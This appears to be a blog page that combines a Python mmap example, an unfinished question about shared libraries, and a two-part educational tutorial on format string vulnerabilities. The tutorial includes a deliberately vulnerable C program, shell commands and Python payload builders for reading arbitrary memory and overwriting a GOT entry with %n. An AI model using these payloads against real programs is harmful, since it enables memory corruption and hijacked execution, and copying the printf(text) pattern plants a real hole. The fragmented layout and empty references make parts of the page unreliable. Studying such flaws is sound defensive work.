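To get a feel for what “refer to a file as if it were in memory” means, here is a minimal Python sketch using the standard mmap module. It maps a throwaway temp file, patches a few bytes through the mapping, and reads the file back. It says nothing about how the dynamic linker itself calls mmap, and the function names are just for this example.

```python
import mmap
import os
import tempfile


def patch_file_via_mmap(path, offset, data):
    """Overwrite len(data) bytes at offset by writing to a mapping."""
    with open(path, "r+b") as handle:
        # Length 0 maps the whole file.
        with mmap.mmap(handle.fileno(), 0) as view:
            view[offset:offset + len(data)] = data
            view.flush()


def demo():
    """Create a temp file, patch it through mmap, return its contents."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as handle:
            handle.write(b"hello mmap world")
        patch_file_via_mmap(path, 0, b"HELLO")
        with open(path, "rb") as handle:
            return handle.read()
    finally:
        os.remove(path)


print(demo())
```

The write goes through ordinary slice assignment on the mapping; no write() call is made on the file after it is mapped.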

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them to the processes virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/

So far the best material I’ve found related to these subjects was

and one that looks good but I haven’t had a chance to read yet this one is especially good:

Format String Vulnerabilities: Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In part two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input that uses a format character that expects its value to be passed by reference and you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%<N>x	      Pads the printed value to at least N characters.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write the integer value of our 4 byte target address one byte at a time.

We can write the lower order bits and shift the target address by a byte, utilizing width padding characters to control the integer value we write to a given byte.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>

If we can overwrite an address, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find the address for printf

nobody@nobody:~$ objdump -R ./text_to_print
08049660 R_386_JUMP_SLOT   printf

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n to. We’ll use ‘l’ (ell) for long unsigned int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.

Here’s what it looks like when we run it (note we have to escape the $ with a \ for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "\x60\x96\x04\x08"')%48875x%4\$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities in Hacking: The Art of Exploitation. It talks all about these techniques and more.
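
The padding arithmetic is the part that is easy to get wrong by hand, so here is a small Python sketch that builds the same input. The function name and the sanity check are my own. It assumes a 32-bit little-endian target and that the address is the first thing in the string, as in the example above.

```python
import struct


def build_write_payload(slot_address, value, arg_index):
    """Build '<address>%<pad>x%<index>$ln' so %n stores `value`."""
    address = struct.pack("<I", slot_address)
    # The 4 address bytes are already counted by printf, so pad the rest.
    width = value - len(address)
    if width < 8:
        # A 32-bit %x can print up to 8 digits; smaller widths are inexact.
        raise ValueError("value too small for a single padded %x")
    return address + f"%{width}x%{arg_index}$ln".encode("ascii")


payload = build_write_payload(0x08049660, 0xBEEF, 4)
print(payload)
```

With the printf slot at 0x08049660 and a target value of 0xbeef this gives a width of 48875, matching the command line above.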

Format String Vulnerabilities: Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

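#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(EXIT_FAILURE);
   }
   strncpy(text, argv[1], 1024);
   text[1023] = '\0';

   printf(text);   /* vulnerable: user input is used as the format string */
   printf("\n");

   return EXIT_SUCCESS;
}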

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless, right? It’s not! This code has a serious format string vulnerability. The problem is that the call to printf should have been:

 printf("%s", text);

Why does it matter? Well the way that printf works is that all of the variable arguments for the format strings are passed in reverse order onto the stack. Printf then parses the input until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to take format characters, printf will mistakenly reference previous elements on stack. We can use this to effectively read the stack. For instance

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the start of the string, followed by 3 stack positions (printed as 8 hex characters each), and then putting a ‘%s’ format character at the 4th position to read our address. Like this (in the Python version, the ‘+’ separates the values for readability)

nobody@nobody:~$ ./text_to_print $(printf "\x34\xf8\xff\xbf")%08x%08x%08x%s

or with Python like this

nobody@nobody:~$ ./text_to_print $(printf "\x34\xf8\xff\xbf")$(python -c 'print "%08x+"*3')%s

00000000 is the contents of address 0xbffff834!

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!
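
If you want to generate the read input programmatically, something like the following Python sketch should do. The function name is hypothetical, and it assumes the same layout as the example: a 32-bit little-endian address at the start of the string, with the string itself showing up as the 4th argument.

```python
import struct


def build_read_payload(address, skipped_args=3):
    """Address first, then %08x per skipped argument, then %s to read it."""
    return struct.pack("<I", address) + b"%08x" * skipped_args + b"%s"


payload = build_read_payload(0xBFFFF834)
print(payload)
```

The number of skipped arguments depends on the stack layout of the target binary, so treat the default of 3 as specific to this example.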
